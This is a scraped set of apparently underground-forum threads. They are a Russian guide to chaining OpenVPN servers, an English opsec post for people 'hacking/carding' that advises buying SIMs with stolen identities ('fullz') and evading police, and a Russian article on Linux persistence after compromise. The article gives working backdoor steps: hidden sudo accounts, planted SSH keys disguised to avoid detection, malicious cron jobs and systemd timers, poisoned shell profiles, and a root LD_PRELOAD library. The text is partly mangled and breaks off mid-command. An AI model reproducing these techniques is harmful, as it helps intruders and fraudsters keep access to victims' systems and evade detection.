Это файл содержит настройки UFW, которое применяются перед применением правил UFW. Добавьте в начало файла выделенные красным строки. Это настроит правила, применяемые по умолчанию, к цепочке POSTROUTING в таблице nat и будет скрывать весь трафик от VPN:

/etc/ufw/before.rules

Click to expand...

rules.before

Rules that should be run before the ufw command line added rules. Custom

rules should be added to one of these chains:

ufw-before-input

ufw-before-output

ufw-before-forward

START OPENVPN RULES

NAT table rules

*nat
:POSTROUTING ACCEPT [0:0]

Allow traffic from OpenVPN client to eth0

-A POSTROUTING -s 10.8.1.0/24 -o eth0 -j MASQUERADE
COMMIT

END OPENVPN RULES

Don't delete these required lines, otherwise there will be errors

. . .

Click to expand...

Сохраните и закройте файл.

Теперь мы должны сообщить UFW, что ему по умолчанию необходимо разрешать перенаправленные пакеты. Для этого откройте файл /etc/default/ufw:

sudo vi /etc/default/ufw
Найдите в файле директиву DEFAULT_FORWARD_POLICY. Мы изменим значение с DROP на ACCEPT:

/etc/default/ufw

Click to expand...

DEFAULT_FORWARD_POLICY="ACCEPT"

Click to expand...

Сохраните и закройте файл.

Открытие порта OpenVPN и применение изменений Далее настроим сам файрвол для разрешения трафика в OpenVPN.

Если вы не меняли порт и протокол в файле /etc/openvpn/server.conf, вам необходимо разрешить трафик UDP для порта 1194. Если вы изменили эти настройки, введите указанные вами значения. В моем случае это TCP порт 1194

Также добавьте ваш SSH порт

Bash:Copy to clipboard

sudo ufw allow 22 sudo ufw allow 1194/tcp

Теперь деактивируем и активируем UFW для применения внесённых изменений:

Bash:Copy to clipboard

sudo ufw disable sudo ufw enable

Теперь наш сервер сконфигурирован для обработки трафика OpenVPN.

Шаг 9. Включение сервиса OpenVPN
Мы готовы включит сервис OpenVPN на нашем сервере. Мы можем сделать это с помощью systemd.

Нам необходимо запустить сервер OpenVPN указав имя нашего файла конфигурации в качестве переменной после имени файла systemd. Файл конфигурации для нашего сервера называется /etc/openvpn/server.conf, поэтому мы добавим dedione_store в конец имени файла при его вызове:

sudo systemctl start openvpn@server
Убедимся, что сервис успешно запущен командой:

sudo systemctl status openvpn@server
Если всё в порядке, настроем сервис на автоматическое включение при загрузке сервера:

sudo systemctl enable openvpn@server

Шаг 10. Создание инфраструктуры настройки клиентов
Далее настроим систему для простого создания файлов конфигурации для клиентов.

Создание структуры директорий конфигурации клиентов В домашней директории создайте структуру директорий для хранения файлов:

Bash:Copy to clipboard

sudo su - openvpn-ca mkdir -p ~/client-configs/files

Поскольку наши файлы конфигурации будут содержать клиентские ключи, мы должны настроить права доступа для созданных директорий:

chmod 700 ~/client-configs/files
Создание базовой конфигурации Далее скопируем конфигурацию-пример в нашу директорию для использования в качестве нашей базовой конфигурации:

cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf ~/client- configs/base.conf
Откройте этот файл в вашем текстовом редакторе:

vi ~/client-configs/base.conf
Сделаем несколько изменений в этом файле.

Сначала найдите директиву remote. Эта директива сообщает клиенту адрес нашего сервера OpenVPN. Это должен быть публичный IP адрес вашего сервера OpenVPN. Если вы изменили порт, который слушает сервер OpenVPN, измените порт по умолчанию 1194 на ваше значение:

~/client-configs/base.conf

Click to expand...

. . .

The hostname/IP and port of the server.

You can have multiple remote entries

to load balance between the servers.

remote server_IP_address 1194
. . .

Click to expand...

Убедитесь, что протокол совпадает с настройками сервера:

~/client-configs/base.conf

Click to expand...

proto tcp

Click to expand...

Далее раскомментируйте директивы user и group удаляя ";":

~/client-configs/base.conf

Click to expand...

Downgrade privileges after initialization (non-Windows only)

user nobody
group nogroup

Click to expand...

Найдите директивы ca, cert и key. Закомментируйте эти директивы, так как мы будем добавлять сертификаты и ключи в самом файле:

~/client-configs/base.conf

Click to expand...

SSL/TLS parms.

See the server config file for more

description. It's best to use

a separate .crt/.key file pair

for each client. A single ca

file can be used for all clients.

#ca ca.crt
#cert client.crt
#key client.key

Click to expand...

Добавьте настройки cipher и auth согласно заданным в файле /etc/openvpn/server.conf:

~/client-configs/base.conf

Click to expand...

cipher AES-256-CBC
auth SHA512

Click to expand...

Далее добавьте директиву key-direction в любое место в файле. Она должна иметь значение "1" для корректной работы сервера:

~/client-configs/base.conf

Click to expand...

key-direction 1

Click to expand...

Создание скрипта генерации файлов конфигурации Теперь создадим простой скрипт для генерации файлов конфигурации с релевантными сертификатами, ключами и файлами шифрования. Он будет помещать сгенерированные файла конфигурации в директорию ~/client-configs/files.

Создайте и откройте файл make_config.sh внутри директории ~/client-configs:

vi ~/client-configs/make_config.sh
Вставьте следующие текст в этот файл:

~/client-configs/make_config.sh

Click to expand...

Bash:Copy to clipboard

#!/bin/bash # First argument: Client identifier KEY_DIR=~/openvpn-ca/keys OUTPUT_DIR=~/client-configs/files BASE_CONFIG=~/client-configs/base.conf cat ${BASE_CONFIG} \ <(echo -e '<ca>') \ ${KEY_DIR}/ca.crt \ <(echo -e '</ca>\n<cert>') \ ${KEY_DIR}/${1}.crt \ <(echo -e '</cert>\n<key>') \ ${KEY_DIR}/${1}.key \ <(echo -e '</key>\n<tls-auth>') \ ${KEY_DIR}/ta.key \ <(echo -e '</tls-auth>') \ > ${OUTPUT_DIR}/${1}.ovpn

Сохраните и закройте файл.

Сделайте его исполняемым файлом командой:

chmod 700 ~/client-configs/make_config.sh

Шаг 11. Генерация конфигураций клиентов
Теперь мы можем легко сгенерировать файлы конфигурации клиентов.

Если вы следовали всем шагам этой статьи, вы создали сертификат clientsrv2.crt и ключ клиента clientsrv2.key командой ./build-key clientsrv2 на шаге 6. Вы можете сгенерировать конфигурацию для этих файлов перейдя в директорию ~/client-configs и используя только что созданный нами скрипт:

Bash:Copy to clipboard

cd ~/client-configs ./make_config.sh clientsrv2

Если всё прошло успешно, мы должны получить файл clientsrv2.ovpn в директории ~/client-configs/files:

ls ~/client-configs/files
Вывод

clientsrv2.ovpn

Click to expand...

Доставка конфигураций на первый сервер Теперь мы должны переместить файл конфигурации первый сервер SRV1.

На первом сервере делаем все идентично, кроме следующих пунктов:
sudo vi /etc/ufw/before.rules
Интерфейс eth0 меняем на tun1 и адрес 10.8.1.0/24 на 10.8.0.0/24

/etc/ufw/before.rules

Click to expand...

rules.before

Rules that should be run before the ufw command line added rules. Custom

rules should be added to one of these chains:

ufw-before-input

ufw-before-output

ufw-before-forward

START OPENVPN RULES

NAT table rules

*nat
:POSTROUTING ACCEPT [0:0]

Allow traffic from OpenVPN client to tun1

-A POSTROUTING -s 10.8.0.0/24 -o tun1 -j MASQUERADE
COMMIT

END OPENVPN RULES

Don't delete these required lines, otherwise there will be errors

. . .

Click to expand...

Сохраните и закройте файл.

Перенаправление всего трафика через VPN сервер

Адрес сети VPN сервера

sudo vi /etc/openvpn/server.conf

/etc/openvpn/server.conf

Click to expand...

ethernet bridging. See the man page for more info.

server 10.8.0.0 255.255.255.0

Click to expand...

Протокол ставим udp4

/etc/openvpn/server.conf

Click to expand...

TCP or UDP server?

proto udp4

Click to expand...

Далее раскомментируйте следующие строки. Секция redirect-gateway:

/etc/openvpn/server.conf

Click to expand...

push "redirect-gateway def1 bypass-dhcp"

Click to expand...

и секция dhcp-option

/etc/openvpn/server.conf

Click to expand...

push "dhcp-option DNS 208.67.222.222"
push "dhcp-option DNS 208.67.220.220"

Click to expand...

также эту директиву

explicit-exit-notify 1

Click to expand...

Прописываем правила маршрутизации на первом сервере:

Создадим скрипт /etc/openvpn/upstream-route.sh содержащий следующие команды:

Bash:Copy to clipboard

#!/bin/sh ip rule add from 10.8.0.0/24 table 120 ip route add default dev tun1 table 120 exit 0

chmod +x /etc/openvpn/upstream-route.sh
Далее добавим их в файл конфигурации клиента который подключается ко второму серверу.

vi clientsrv2.ovpn

clientsrv2.ovpn

Click to expand...

script-security 2
up upstream-route.sh

Click to expand...

Также в этом файле необходимо указать чтобы OpenVPN клиент всегда занимал интерфейс tun1:

clientsrv2.ovpn

Click to expand...

dev tun1

Click to expand...

Скопируем clientsrv2.ovpn в корневую папку OpenVPN и переиминуем его в client.conf

sudo cp clientsrv2.ovpn /etc/openvpn/client.conf
Настраиваем автозауск

Bash:Copy to clipboard

# server sudo systemctl start openvpn@server sudo systemctl enable openvpn@server # client to srv2 sudo systemctl start openvpn@client sudo systemctl start openvpn@client

Точно так же создаем инфраструктуру настройки клиентов. Шаг 10 И сгенерированный файл переносим на клиентскую машину.
**
Подключение на Linux**

Bash:Copy to clipboard

sudo apt update sudo apt install openvpn sudo openvpn --config clientsrv1.ovpn

В результате вы подключитесь к серверу.

Yet another guide for anonymity

ID: 676533bbb4103b69df3719c0
Thread ID: 106401
Created: 2024-01-22T13:08:54+0000
Last Post: 2024-01-22T22:52:14+0000
Author: hasemail
Replies: 1 Views: 469

I'll break this down in 3 steps. Networking > Setup > Behavior

Network:

First and fore most, why the $%* are people on here talking about VPN through TOR through sox this that and you read they are using their home wifi. Even a public or neighbors wifi isn't all that great. You think if cops show up they will really just go to your neighbors house and arrest them lol? They already know whats going on if they have to show up. Forget about you're home internet, completely. This should never be an option. I'm not in the USA but tmobile offers international data plans not stupid expensive so before you say my country doesn't have it think twice. For the people who say "I'm a flip phone guy" like its the cool thing to do lol. Those flip phones are probably the worst burner devices one can have. SMS is always saved whether you like it or not, thats if it is not being intercepted. So regardless you're fucked, telecommunication company or cops.

What do you do is you buy 2 apple devices.An iphone (doesnt really matter in my opinion let me know if you disagree) and a 4-5th generation ipod touch (not sure which one was the last one to not carry GPS, the newer ones do). You then jailbreak the ipod touch so you can download tetherme on it. The iphone, you jailbreak as well and install tetherme. I shoudnt even have to say this but its sad that i am. Those 2 devices have zero idea of you. Never use it for personal or business. No matter what. Walk home 30 minutes in rain/snow instead of using those devices to call a friend or family to pick you up. When not being used, sim cards out devices off. As far as the sim card, you need 1 Prepaid sim for the iphone. Each country is different but I wont go into detail about how to get a prepaid sim with cash and use fullz with bitrefill or prepaid gift card because its self explanatory. You use the SIM card max for 1 month, then its garage you rinse and repeat. You are better off getting a unlimited talk/text/internet plan rather than data only (even if you are going to use this only for internet, ill explain why). Your jailbroken iphone with tetherme should only log into icloud to download a preferred VPN maybe even 2. Then log out of icloud all location eveyrthing off findmyiphone off and you enable tether override data VPN and connect the ipod touch with bluetooth or wiif. I wish there was a USB way of connecting to tether iphone>ipod but i guess Bluetooth is kind of safer but i dnno. I noticed VPN has to be TCP in order for it to be able to perform these tasks, UDP dies if you are hooping through multiple devices i think. So now you have an ipod touch with internet already on a VPN technically because the iphone is sharing VPN data through tetherme. Youre telecommunication company 9/10 times will consider this as normal data and not tethered data so youre speeds wont be throttled. Amazing perk in my opnion. Now this ipod touch, download another VPN on it. Then download preferred VOIP app to use ipod as a phone. ipod has headphone jack you can utilize in-headphone-mic or some ipod touches have built in microphone but if you are extra safe you get no microphone and use wired headpohne with mic so no1s listening always.

That solves your burner phone problem. Your ipod touch is now a router technically! turn on tetherme to share data OVER USB ONLY on the ipod. So connection is basically prepaidsim>jailbrokenVPNiphoneTether>ipod>USBTetherrouter/laptop. Your ipod could connect to a router or its best to just USB directly into device and eliminate wifi in full.

^ Anyone disagree with that method or have any additions/revisions?

Setup:

Same regards to your laptop as iphone and ipod. Never store personal info on it. Download qubes OS. Learn it. Qubes allows you to have multiple VPNS configured to different OS whether its windows or linux and honestly its the next big thing. Compartmentalize! Figure out what works for you and what doesnt and research it until you are certain your setup is good. At this point I think its preference how you want to connect whether its all data through tor or VPN>tor. Keep in mind you technically are already looping through 2 VPNS to even connect to the laptop so it should be safe. Qubes should have 64-128gb imo and you need another 3-4 VPN accounts imo to be okay. Each qube os has diff vpn.

Behavior:

,You always have to be luckily. Those after you just need to be lucky one time. Behavior is as important as OPSEC. Whether its technqiue or long tongue behavior has to switch and adapt constantly. You dont want to attach to one method/personailty/technque because data now a days is humans biggest exploit period, let alone somebody in this filed. Take your SE methods and SE yourself to do things diff walk home diff paths, dont always do same same same. Are you a student always at school during class connecting to this ipod and commiting crime? Are you an office worker at work shitting where you sleep? If your phone is always on you even with this ipod device? or better yet any device or connection. If you are hacking/carding whatever and your physical personal device is ALWAYS on you, then you are fucked. you need to learn to isolate and completely disconnect yourself from your first life because you are techincally living a double life lol. Behavior ends by keeping your mouth shut. Always. Always Shut.

Oh and why would I tell you this? Because i adapted and am changing lol...sit and think. let me know what you think.

Persistence Linux

ID: 676533bbb4103b69df3719c6
Thread ID: 105677
Created: 2024-01-12T19:46:38+0000
Last Post: 2024-01-14T21:23:38+0000
Author: Synd1c4t
Prefix: Статья
Replies: 4 Views: 469

**Создание учетной записи в Linux **

Spoiler

Операционная система Linux обычно может иметь два типа учетных записей: «Root» и «User». Обычно существует два способа манипулирования учетными записями для обеспечения постоянного доступа к машине

Создание учетной записи пользователя

Spoiler

Если мы (злоумышленник) скомпрометировали хост и хотим сохранить Persistence доступ, создав обычную учетную запись пользователя, то мы можем использовать useradd следующим образом:

Code:Copy to clipboard

shell # создайте учетную запись пользователя с домашним каталогом в /home/username sudo useradd -m <username> # чтобы иметь возможность войти в созданную учетную запись, для этой учетной записи должен быть установлен пароль sudo passwd <username>

Создание учетной записи root/суперпользователя

Spoiler

Обычно на компьютере с Linux есть пользователь root, но он не включен, мы можем включить его, указав им пароль, например: sudo passwd, и можем установить для них пароль, чтобы включить root-доступ к машине. Но если мы хотим создать пользователя и добавить его в группы sudoers, мы можем использовать следующие команды:

Code:Copy to clipboard

sh # Создать учетную запись пользователя sudo useradd <username> # теперь добавьте пользователя в группу suders sudo usermod -aG sudo <username>

Постоянство с использованием авторизованных ключей SSH

Spoiler

Для сохранения Persistence доступа к Машине злоумышленник может изменить файл authorized_keys для сохранения Persistence доступа на хосте-жертве. У нее так дела обстоят. Этот файл обычно находится в <user- home/.ssh/authorized_keys>.

Злоумышленник может сгенерировать ключи SSH с помощью ssh-keygen, он сгенерирует открытый ключ id_rsa.pub следующим образом:

Code:Copy to clipboard

``` ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwIqohDVyEsHt5lHcI86scq5EWVm+DYpvhuolEV8EnkOonUFABgC2/9KdbMlG/di19N3oWRo60WG1F/LbRg5TNBzfuaKSU5UDoGCOI6m/DzwBkSfJUcnRoYg/2OSSPnqQP+V8aCISyiHcs5LuS996t9oGKWiwyyg4ScXeIGtlKZzgHPUl2+L6K2Rtga+GsI+X4sXUSAYbNR9xPDxwPqw5+ShwT7F+1HzR3ITI+uzySXKQVq4cXMkaJvuiwW1r/R8oeyd05DWlj67OCyH9ZS4dnamDoXdGYZ1B/DFp4eZQX5TB9Ggwu2FZ/aeWzv+tRPBDw5LKGdNtSfS7l+wNZNFUSeuNJdWYBNA0Dww4SMkgZdY8K95s1QiG/EcajFjGulbsl8Cpnmx3nTJsMdBtsRLgKIPylA0DWysgrL6cyEIXkCoIs/tnv+YCvvnTAEvbINEB0VMSaJUtqID5tG7+MbdOt/Lew9jmeh/uYfQ7i60zHfZNKJ3/lCPeKEN/aExui7k0= root@kali ```

чтобы избежать обнаружения, мы также можем заменить имя в конце на что-то допустимое, например: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwIqohDVyEsHt5l…… [synd1c4t@ecorp.com](mailto:synd1c4t@ecorp.com)

Persistence с использованием запланированной задачи

Spoiler

Persistence доступ к машине может быть осуществлен путем создания нескольких конкретных задач расписания, обычно их две: создание задачи расписания «изменение/создание cronjobs» или «модификация/создание вредоносного таймера».

Работа в Cron

Spoiler

Cronjobs - это способ создания задачи по расписанию на машине linux, подобно тому, как мы используем schtasks в windows.

мы можем создать наше вредоносное задание cron, чтобы предоставить нам Persistence доступ, обычно это делается путем настройки определенных файлов, вот некоторые из них:

– /etc/crontab

– /etc/cron.d/*

– /etc/cron.{hourly,daily,weekly,monthly}/*

– /var/spool/cron/crontab/*

Если вы являетесь пользователем, вы можете изменить свой собственный crontab, используя crontab -e. Это создаст файл в /var/spool/cron/crontab/<user>, соответствующий пользователю, который выполняет изменения. например, вот как будет выглядеть вредоносный файл задания cron:

Code:Copy to clipboard

*/5 * * * * /opt/backdoor.sh

Здесь скрипт бэкдора будет запускаться каждые 5 минут.

Итак, когда мы создаем любое задание cron с помощью команды типа crontabl -e, оно создаст файл в /var/spool/cron/crontab/<user>, но создаст файл конфигурации в etc/crontab или /etc/crontab.d/<ПРОИЗВОЛЬНЫЙ ФАЙЛ>. В отличие от файлов в /var/spool/cron/*, где пользователь заданий подразумевается в зависимости от того, чей это crontab, строки в /etc/crontab включают имя пользователя. Злоумышленник с привилегиями root может изменить эти файлы, чтобы получить Persistence доступ к машине. Пример :

_

Code:Copy to clipboard

shell vi /etc/crontab/ */2 * * * * root /opt/beacon.sh

_
Это будет запускать /opt/backdoor.sh каждые 2 минуты от имени root.

Системные таймеры

Spoiler

Это еще один необычный подход к получению Persistence доступа к Linux-машине. Итак, что происходит, обычно все службы на Linux-машине запускаются во время загрузки, у них есть определенная запись инициализации в процессе загрузки. но эти службы могут запускаться в определенное время, также используя «таймеры».

Чтобы увидеть таймеры на машинах, мы можем использовать следующую команду: systemctl list-timers

Чтобы создать наш вредоносный Persistence к файлу с таймером, нам понадобятся две вещи:

– Вредоносный файл .service

– Вредоносный файл .timer

Файлы .service аналогичны всем остальным файлам служб, которые настроены для выполнения конкретной задачи, например запуска нашего бэкдор-скрипта. Мы можем сделать это следующим образом:

Мы создали его службу по адресу /etc/systemd/system/malicious.service

Code:Copy to clipboard

[Unit] Description=Bad service [Service] ExecStart=/opt/backdoor.sh

Теперь нам нужно создать файл .timer, который представляет собой не что иное, как файл триггера, который будет запускать нашу вредоносную службу в определенное время. пример :

Мы создали файл /etc/systemd/system/malicious.timer

Code:Copy to clipboard

[Unit] Description=malicious timer [Timer] OnBootSec=5 OnUnitActiveSec=5m [Install] WantedBy=timers.target

Здесь OnUnitActiveSec=5m: сколько времени нужно ждать перед повторным запуском службы. Через каждые 5 минут мы будем запускать нашу службу и потенциально предоставлять нам Persistence доступ к машине.

** обязательно запустите службу и включите ее, чтобы она работала **

Code:Copy to clipboard

shell # systemctl daemon-reload systemctl enable scheduled_bad.timer systemctl start scheduled_bad.timer

Изменение конфигурации оболочки

Spoiler

Оболочка в Linux является наиболее важной частью ее среды, но она загружает множество других файлов конфигурации, которые выполняются при каждом запуске или завершении оболочки. Вот некоторые из этих файлов.

Файлы| Работающий
---|---
/etc/bash.bashrc| общесистемные файлы, выполняемые при запуске интерактивной оболочки
(tmux)
/etc/bash_logout| Системные файлы, выполняемые при завершении работы оболочки
~/.bashrc| Широко эксплуатируемый пользовательский сценарий запуска, выполняемый при
при запуске оболочки
~/.bash_profile, ~/.bash_login,
~/.profile| Файлы, специфичные для пользователя, но найденные первыми, выполняются первыми
~.bash_logout| Файлы, специфичные для пользователя, выполняются при закрытии сеанса оболочки
~/.bash_logout| Пользовательский сценарий очистки в конце сессии
/etc/profile| Общесистемные файлы, выполняемые при запуске оболочек входа в систему
/etc/profile.d| Все файлы .sh создаются при запуске оболочки входа в систему

Совет: попробуйте сначала изменить ~/.profile или /etc/profile, чтобы скрыть себя, не нарушая нормальную конфигурацию оболочки.

Таким образом, файл (~/profile) будет выглядеть примерно так:

Code:Copy to clipboard

shell # если запущен bash if [ -n "$BASH_VERSION" ]; then # включаем .bashrc, если он существует if [ -f "$HOME/.bashrc" ]; then . "$HOME/.bashrc" fi fi chmod +x /opt/backdoor.sh /opt/backdoor.sh

Перехват динамического компоновщика

Spoiler

Это передовая технология Persistence, обычно используемая при ** разработке руткитов для Linux **. Прежде чем злоупотреблять этим методом для использования Persistence доступа к машине с Linux, давайте сначала поймем, что такое динамический компоновщик в Linux:

Что такое динамический компоновщик 101

В современной операционной системе программа может быть связана статически или динамически во время выполнения. Динамически связанные двоичные файлы используют общие библиотеки, расположенные в операционной системе. Эти библиотеки будут разрешены, загружены и связаны во время выполнения. Компонент Linux, отвечающий за эту операцию, — это ** динамический компоновщик **, также известный как ld.so или ld-linux.so.*. Во время выполнения динамического компоновщика используется ряд переменных среды, наиболее важной из которых является ** LD_PRELOAD **.

Что такое LD_PRELOAD

Spoiler

Компонент динамического компоновщика Linux, называемый LD_PRELOAD, который обеспечивает превосходную возможность хранения списка определяемых пользователем общих объектных файлов ELF. LD_PRELOAD позволяет нам загружать эти общие объектные файлы в адресное пространство процесса до самой программы, что потенциально позволяет контролировать поток выполнения. LD_PRELOAD можно установить, записав в файл /etc/ld.so.preload или используя переменную среды LD_PRELOAD.

В основном он используется для отладки и тестирования программы во время выполнения, но им можно злоупотребить, написав вредоносную запись общего объекта в LD_PRELOAD.

** По умолчанию переменная LD_PRELOAD и файл /etc/ld.so.preload не установлены **, поэтому, если мы можем использовать ldd или strace, чтобы найти зависимость библиотеки и файлов библиотеки, открытых в памяти соответственно, это выдаст сообщение «Такой файл не найден». например, двоичный файл «ls» в Linux

Создание вредоносной библиотеки общих объектов для Persistence

Spoiler

[/CODE]preload.c

#include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setresuid(0,0,0); system("/opt/backdoor.sh"); }

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /root/Desktop/preload.c [/CODE] Это создаст желаемый файл .so, который мы теперь можем использовать для Persistence. Теперь просто добавьте это в `echo “”/tmp/preload.so” >> /etc/ld.so.preload`, чтобы каждый раз, когда программа загружается в память, сначала загружался ваш вредоносный общий объектный файл и, возможно, позволял нам постоянный доступ. ## Двоичный SUID Spoiler SUID (установка идентификатора пользователя) — это особый тип разрешений, предоставляемых файлу в системах Linux и Unix. Когда пользователь запускает файл с включенным SUID, файл запускается с разрешениями владельца файла, а не пользователя, который его запустил. Это особенно полезно для предоставления пользователям возможности запускать программы с временно повышенными привилегиями. ### Использование SUID для Persistence Spoiler В контексте системного администрирования или безопасности Linux SUID можно использовать для Persistence, позволяя непривилегированному пользователю выполнять двоичный файл с более высокими привилегиями. Однако важно отметить, что это может представлять собой серьезную угрозу безопасности при неправильном использовании или реализации без надлежащих мер безопасности. ### Пример сценария Spoiler Допустим, у нас есть скрипт, который необходимо запустить с правами root, но мы хотим разрешить пользователю, не являющемуся root, выполнить его. **Создайте сценарий** . Сначала напишите сценарий, выполняющий желаемую задачу. Например, скрипт для вывода содержимого корневого каталога: Code:Copy to clipboard [ICODE]#!/bin/bash ls /root [/ICODE] `[B]Сохранить и сделать исполняемым [/B] : сохраните этот скрипт как listRootDir.shи сделайте его исполняемым:` `[CODE]chmod +x listRootDir.sh[/CODE]` `[B]Изменить владельца [/B] : измените владельца скрипта на root:` `[CODE][ICODE]sudo chown root:root listRootDir.sh[/CODE]`[/ICODE] `[ICODE][B]Установить бит SUID [/B] : установите бит SUID в сценарии:`[/ICODE] `[ICODE][ICODE][CODE]sudo chmod u+s listRootDir.sh[/CODE]`[/ICODE][/ICODE] ## rc.common/rc.local Spoiler * **Местоположение** : Обычно rc.localнаходится по адресу /etc/rc.local. * **Назначение** : выполняется системой инициализации в конце процесса загрузки. * **Пользовательские команды** : администраторы могут помещать в этот файл собственные команды запуска. * ### С использованием rc.local для Persistence Spoiler **Редактировать rc.local** : Открой rc.localфайл с помощью текстового редактора. Для редактирования вам нужны root-права. Code:Copy to clipboard sudo nano /etc/rc.local **Добавить команды** : перед exit 0добавьте команды или сценарии, которые вы хотите выполнять при запуске. Например, чтобы запустить собственный скрипт: Code:Copy to clipboard #!/bin/sh -e # # rc.local # #Этот скрипт выполняется в конце каждого многопользовательского уровня. # Убедитесь, что скрипт будет "выходить 0" при успехе или любое другое # значение при ошибке. # # Чтобы включить или отключить этот скрипт, просто измените исполнение # биты # # По умолчанию этот скрипт ничего не делает. /path/to/your/script.sh exit 0 **Делать rc.local Исполняемый файл** : Если rc.local еще не исполняемый файл, измените его разрешения: Code:Copy to clipboard sudo chmod +x /etc/rc.local **Перезагрузка** : перезагрузите систему, чтобы проверить, запускается ли сценарий при запуске. Code:Copy to clipboard sudo reboot ### Пример: запуск службы Spoiler Если вы хотите запустить специальную службу при загрузке, вы можете добавить строку в rc.local: Code:Copy to clipboard sudo /usr/bin/myservice ## Systemd службы Spoiler С использованием systemd Services — это современный и эффективный способ добиться Persistence в Linux. systemd— это система инициализации и менеджер служб в большинстве дистрибутивов Linux, отвечающий за загрузку пользовательского пространства и управление системными процессами после загрузки. Создав индивидуальный systemd сервис, вы можете гарантировать, что определенные приложения или сценарии будут запускаться автоматически при запуске системы. ### Создание пользовательского systemd Сервиса Spoiler **Напишите свой сценарий** . Сначала создайте сценарий, который вы хотите запускать при запуске. Например, создайте скрипт с именем my_script.sh: Code:Copy to clipboard #!/bin/bash echo "My custom service is running" > /tmp/custom_service.log Обязательно сделайте ваш скрипт исполняемым: Code:Copy to clipboard chmod +x /path/to/my_script.sh **Создайте служебный файл** : создайте новый systemdслужебный файл в /etc/systemd/system/. Например, my_custom_service.service: Code:Copy to clipboard sudo nano /etc/systemd/system/my_custom_service.service Добавьте в служебный файл следующее содержимое: Code:Copy to clipboard [Unit] Description=My custom service After=network.target [Service] Type=simple ExecStart=/path/to/my_script.sh Restart=on-abort [Install] WantedBy=multi-user.target * Description: Краткое описание вашего сервиса. * After: определяет порядок запуска служб. * Type: тип запуска службы, simpleявляется наиболее распространенным. * ExecStart: команда для запуска вашего скрипта. * Restart: Когда перезапустить службу. * WantedBy: определяет цель, к которой должна быть подключена служба. **Перезагрузить systemd**Daemon** ** : После создания служебного файла перезагрузите systemd демон для чтения нового служебного файла: Code:Copy to clipboard sudo systemctl daemon-reload Включите и запустите свою службу. Включите запуск службы при загрузке, а затем немедленно запустите ее: Code:Copy to clipboard sudo systemctl enable my_custom_service.service sudo systemctl start my_custom_service.service Проверьте статус: Чтобы проверить статус вашей новой услуги: Code:Copy to clipboard sudo systemctl status my_custom_service.service ### Соображения безопасности Spoiler * **Минимальные привилегии** . Запускайте службу с минимальными необходимыми привилегиями. * **Безопасный сценарий** : убедитесь, что ваш сценарий безопасен и не содержит уязвимостей. * **Ведение журнала** . Внедрите ведение журнала в свой скрипт для мониторинга и отладки. ### Преимущества использования systemd сервиса Spoiler * **Последовательность** : systemd обеспечивает стандартизированный способ управления сервисом. * **Управление зависимостями** : он обрабатывает разрешение зависимостей и порядок обслуживания. * **Ведение журнала и мониторинг** : интегрировано с systemdСистема журналирования для удобного ведения журнала и мониторинга. * **Управление ресурсами** : предлагает функции управления системными ресурсами. ## Trap Spoiler Команда trap в Linux используется в сценариях оболочки для реагирования на сигналы и другие системные события. Она позволяет указать команду или сценарий для выполнения, когда сценарий получает сигнал. Хотя trap обычно не используется непосредственно для обеспечения Persistence, она может быть использована для повышения надежности сценариев, выполнения задач очистки или обеспечения выполнения определенных действий, даже если сценарий прерывается. Это может косвенно способствовать более надежному и устойчивому поведению системы. ### Использование trap в скриптах Spoiler Команда trap может перехватывать сигналы и выполнять указанную команду или набор команд при получении сигнала. Обычные сигналы включают SIGINT (прерывание, обычно посылается нажатием Ctrl+C), SIGTERM (сигнал завершения) и EXIT (когда скрипт завершается нормально или по одному из сигналов). Code:Copy to clipboard trap [commands] [signals] #### Пример использования Spoiler Обработка прерываний: Создайте сценарий, который будет очищать временные файлы, даже если его выполнение прервано. Code:Copy to clipboard #!/bin/bash # Создать временный файл tmpfile=$(mktemp) # Функция очистки временного файла cleanup() { echo "Cleaning up temporary files..." rm -f "$tmpfile" } # Trap SIGINT и SIGTERM вызов функции очистки trap cleanup SIGINT SIGTERM EXIT # Имитировать длительный процесс echo "Running a long process..." sleep 60 # нормальная очистка cleanup 1. В этом сценарии, если пользователь прерывает выполнение сценария с помощью Ctrl+C или если сценарий получает сигнал завершения, cleanup функция вызывается для удаления временного файла. 2. **Вход в систему при выходе** : сценарий, который регистрирует сообщение каждый раз при выходе, независимо от того, как оно было завершено. Code:Copy to clipboard #!/bin/bash log_exit() { echo "Script exited at $(date)" >> /var/log/script.log } trap log_exit EXIT #Остальная часть сценария Этот скрипт запишет сообщение на /var/log/script.log каждый раз, когда он выходит, как обычно, так и по сигналу. ## Backdooring файл запуска пользователя Spoiler Обход файла запуска пользователя в Linux — это метод, используемый для достижения Persistence путем вставки команд в файлы, которые автоматически выполняются при входе пользователя в систему. Обычно целевые файлы включают в себя ~/.bashrc, ~/.profile, или ~/.bash_profileдля пользователей, использующих оболочку Bash. Пример: добавление команды в .bashrc Файл .bashrc выполняется всякий раз, когда пользователь открывает новую оболочку Bash. Добавив команду в этот файл, вы можете гарантировать, что она будет выполняться каждый раз, когда пользователь открывает терминал. #### Шаги **Доступ к файлу** : откройте файл пользователя. .bashrc файл с помощью текстового редактора. Для этого вам необходимо иметь соответствующие разрешения. Code:Copy to clipboard nano ~/.bashrc **Вставить команду** : добавьте команду в конец файла. Например, чтобы создать простую запись в журнале каждый раз, когда пользователь открывает оболочку: Code:Copy to clipboard echo "Shell opened at $(date)" >> ~/.shell_usage_log **Сохранить и выйти** : сохраните файл и выйдите из редактора. Теперь команда будет выполняться каждый раз, когда пользователь запускает новый сеанс оболочки. #### Пример сценария для образовательных целей Допустим, вы проводите учения по безопасности и хотите продемонстрировать, как работает бэкдор в .bashrc работает. Вы можете добавить скрипт, который безвредно сообщает об использовании оболочки: Code:Copy to clipboard # Добавить в конец ~/.bashrc echo "User $USER opened a shell at $(date)" >> /tmp/user_shell_log ## Использование системного вызова Spoiler Давайте углубимся в каждый метод, уделив особое внимание тому, как их можно использовать для обеспечения Persistence. ### Система мониторинга и блокировки вызовов 1. **Подсистема аудита Linux** : * Используется для мониторинга системных вызовов и действий пользователя. * Настроить с помощью auditd и auditctl. * Пример: Для мониторинга системных вызовов доступа к файлам: **eBPF (Extended Berkeley Packet Filter)** : * Позволяет отслеживать системные вызовы в режиме реального времени. * Может использоваться для создания пользовательских инструментов мониторинга. * Пример: Использование bpftrace контролировать execve звонки: Code:Copy to clipboard sudo bpftrace -e 